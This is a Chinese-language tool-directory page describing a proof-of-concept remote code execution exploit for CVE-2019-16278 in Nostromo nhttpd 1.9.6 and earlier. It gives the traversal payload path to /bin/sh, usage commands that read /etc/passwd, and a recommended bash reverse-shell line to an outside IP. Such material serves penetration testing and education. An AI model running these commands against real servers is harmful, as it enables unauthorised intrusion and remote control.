Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-16278 — 针对Nostromo nhttpd ≤ 1.9.6的PoC RCE漏洞利用程序 | Kitploit
工具/GitHubGitHub/andknownmaly/cve-2019-16278
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubandknownmaly/cve-2019-16278

CVE-2019-16278

针对Nostromo nhttpd ≤ 1.9.6的PoC RCE漏洞利用程序

查看仓库
39个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-16278 - Nostromo nhttpd 远程代码执行

漏洞描述

在 Nostromo nhttpd 版本 <= 1.9.6 中存在远程代码执行漏洞,通过 HTTP 请求处理中的目录遍历实现。

受影响版本

  • Nostromo nhttpd 1.9.6 及更早版本

漏洞利用详情

此利用利用了目录遍历漏洞,通过 URL 编码的 CRLF 字符(%0d)访问 /bin/sh 并执行任意命令。

工作原理:

  1. 发送带有路径遍历的 POST 请求:/.%0d./.%0d./.%0d./.%0d./bin/sh
  2. 使用 Content-Length 头部控制有效载荷大小
  3. 通过 shell 重定向执行命令:echo\necho\n<command> 2>&1

使用方法

root@kitploit:~
python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>

示例:

root@kitploit:~
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"

推荐使用反弹 shell,有时此脚本不显示任何内容

要求

  • Python 3
  • 能够访问目标服务器的网络
  • 目标运行有漏洞的 Nostromo nhttpd

参考来源

  • CVE: CVE-2019-16278
  • https://www.exploit-db.com/exploits/47837
  • https://nvd.nist.gov/vuln/detail/CVE-2019-16278

免责声明

此工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是违法的。

下载工具